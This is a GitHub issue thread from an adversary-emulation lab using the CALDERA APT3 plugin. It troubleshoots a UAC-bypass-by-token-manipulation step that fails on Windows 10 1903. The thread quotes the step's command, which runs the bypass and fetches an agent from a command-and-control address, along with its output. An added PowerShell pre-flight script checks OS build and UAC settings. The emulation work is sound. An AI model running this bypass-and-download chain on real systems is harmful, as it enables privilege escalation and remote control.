mitre-attack / evals_caldera

A CALDERA plugin for ATT&CK Evaluations Round 1


[Plugin - Phase 9 - 3.A.1] Bypass User Account Control (T1088)

Cyb3rWard0g opened this issue · comments

Good evening,

First, I wanted to say thank you for all your work on this plugin! 👍

I'm running the APT3 Round1 Day1 scenario in The Shire Mordor Environment, and I got Caldera set up and ready to run the plugin.

Victim: IT001.shire.com
IP: 172.18.39.105
User: pgustavo

I ran sandcat via powershell as shown below

[screenshot: sandcat launched from PowerShell]

I also had two processes running as administrator (right click on cmd and powershell and ran them as Administrators)

I started the operation:

[screenshot: operation started]

And everything was going well until I got to Phase 9 - 3.A.1

[screenshot: Phase 9 - 3.A.1 step output]

Step Script: https://github.com/mitre-attack/evals_caldera/blob/master/data/abilities/defensive-evasion/03afada1-1714-408f-bde5-f528b91dc89d.yml

Output:

```
Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force;Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force;$pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('http://172.18.39.8:8888')"));Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose
VERBOSE: Loading module from path 'C:\Users\pgustavo\Invoke-BypassUACTokenManipulation.ps1'.
VERBOSE: Dot-sourcing the script file 'C:\Users\pgustavo\Invoke-BypassUACTokenManipulation.ps1'.
VERBOSE: Enumerating Process list...
VERBOSE: HI Proc found. ID: 3356 684 7440 2668 7724
VERBOSE: [*] Successfully acquired cmd conhost conhost ctfmon powershell handle
VERBOSE: [*] Opened process token
VERBOSE: [*] Duplicated process token
True
VERBOSE: [*] Lowered token mandatory IL
VERBOSE: [*] Created restricted token
VERBOSE: [*] Duplicated restricted token
Requested registry access is not allowed.
```

Is there anything I can do to troubleshoot this error? I don't have much experience with that script, so I am not sure if it is something I need to do to my box setup to get it to work.

Thank you in advance!

Update:

  • Round1 Day1 was done on Windows 10 1803
  • The Windows workstations in my environment are 1903

Hello @Cyb3rWard0g,
Unfortunately I was unable to replicate this issue with the Bypass User Account Control ability. Do you have an EDR tool on the endpoints that could be blocking the script from running or blocking the registry that the script is attempting to access?

Hey @scottctaylor12, thank you for taking a look at it. I do not have anything but Defender, and it is disabled. The environment that I use is the following (all well documented): https://github.com/hunters-forge/Blacksmith/tree/master/aws/mordor/cfn-files/scripts/default . I also worked with Daniel Weiss on this, and he had the same problems; he is the one who determined that it works on Windows 1803 but not on 1903. One article that talks about this is the following: https://tyranidslair.blogspot.com/2018/10/ . Let me know if this helps. Let me also ask Daniel if he could provide some more details on it.

Bypassing user account control via token manipulation works in Windows 10 v1803, which was used in Round 1 of the evaluations (https://attackevals.mitre.org/methodology/round1/environment.html).

A few posts discuss that with the release of Windows 10 v1809 (RS5 - 17686), bypassing user account control via token manipulation does not work, as Windows implemented a change to the kernel by adding an additional access token check (SeTokenCanImpersonate). @Cyb3rWard0g and I confirmed that it does not work in Windows 10 v1903, which is what the Shire Mordor environment uses.

https://tyranidslair.blogspot.com/2018/10/
https://medium.com/@z3roTrust/bypassing-windows-user-account-control-back-for-more-dd5672c48600
https://twitter.com/tiraniddo/status/1006558397322407936

Our fork added an OS build version check to this step (https://github.com/d4weiss/evals_caldera/blob/master/data/abilities/privilege-escalation/1345bff7-6f26-43b2-a92a-9aabccdb3db0.yml).

The Shire Mordor environment, which uses Windows 10 v1903, sets the UAC level to never notify (https://github.com/hunters-forge/Blacksmith/blob/master/aws/mordor/cfn-files/scripts/default/Prepare-Box.ps1#L69-L71). This is a temporary workaround, allowing the evals_caldera plugin to successfully continue execution after that step.
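The two points in the thread, a build-number guard before the token-manipulation step and the "never notify" UAC setting as a fallback, can be combined into one pre-flight check on the victim. The script below is an added example written for this page; it is not the evals_caldera ability, the d4weiss fork's check, or anything from Prepare-Box.ps1. It assumes the bypass is only worth attempting below build 17763 (Windows 10 v1809; 1803 is build 17134 and 1903 is 18362), that "never notify" corresponds to the standard policy values `ConsentPromptBehaviorAdmin = 0` and `PromptOnSecureDesktop = 0` with `EnableLUA = 1`, and that the function and variable names are my own.

```powershell
# Added example (not part of evals_caldera or the d4weiss fork).
# Pre-flight check for the Phase 9 token-manipulation UAC bypass step:
#   1. read the OS build from the registry and compare it to the first build
#      the thread reports as blocking the bypass (assumed: 17763 / v1809);
#   2. detect whether the current process is already high integrity;
#   3. read the UAC policy values to see whether the environment has
#      "never notify" set (the Mordor workaround) or UAC fully disabled.
function Get-UacBypassPreflight {
    [CmdletBinding()]
    param(
        # Assumption: the first build on which the token-manipulation bypass fails.
        [int]$FirstBlockedBuild = 17763
    )

    $cv  = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $uac = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

    $build = [int]$cv.CurrentBuild
    # ReleaseId holds "1803", "1809", "1903"; newer builds also expose DisplayVersion.
    $release = if ($cv.PSObject.Properties['DisplayVersion']) { $cv.DisplayVersion } else { $cv.ReleaseId }

    # A filtered (medium-integrity) admin token carries the Administrators SID as
    # deny-only, so IsInRole returns $false unless the process is actually elevated.
    $identity   = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal  = New-Object Security.Principal.WindowsPrincipal($identity)
    $isElevated = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    # "Never notify" in the UAC slider: UAC still on, but admins auto-elevate silently.
    $neverNotify = ($uac.EnableLUA -eq 1) -and
                   ($uac.ConsentPromptBehaviorAdmin -eq 0) -and
                   ($uac.PromptOnSecureDesktop -eq 0)

    [pscustomobject]@{
        Release                    = $release
        Build                      = $build
        TokenBypassExpected        = ($build -lt $FirstBlockedBuild)
        AlreadyHighIntegrity       = $isElevated
        UacDisabled                = ($uac.EnableLUA -ne 1)
        UacNeverNotify             = $neverNotify
        ConsentPromptBehaviorAdmin = $uac.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $uac.PromptOnSecureDesktop
    }
}

$pre = Get-UacBypassPreflight
$pre | Format-List

if ($pre.AlreadyHighIntegrity) {
    Write-Verbose 'Already running at high integrity; nothing to bypass.' -Verbose
}
elseif ($pre.TokenBypassExpected) {
    Write-Verbose "Build $($pre.Build): token-manipulation bypass expected to work; run the step." -Verbose
    # Invoke-BypassUACTokenManipulation -Arguments "..." would be invoked here.
}
elseif ($pre.UacNeverNotify -or $pre.UacDisabled) {
    # With "never notify" a plain elevation request succeeds without a prompt,
    # so the operation can continue without the token trick.
    Write-Verbose "Build $($pre.Build): bypass expected to fail, but UAC prompts are off; elevate with Start-Process -Verb RunAs instead." -Verbose
}
else {
    Write-Warning "Build $($pre.Build): token-manipulation bypass is expected to fail (SeTokenCanImpersonate check); skipping the step."
}
```

Run it from the same medium-integrity PowerShell session that launched sandcat: on the Mordor 1903 workstations with the workaround applied it should report `TokenBypassExpected = False` and `UacNeverNotify = True`, while on a Round 1 style 1803 box it reports `TokenBypassExpected = True`. Note that "never notify" does not turn UAC off (`EnableLUA` stays 1), so a process elevated this way still goes through the normal elevation path and shows up in the usual process-creation telemetry rather than as a token-manipulation bypass.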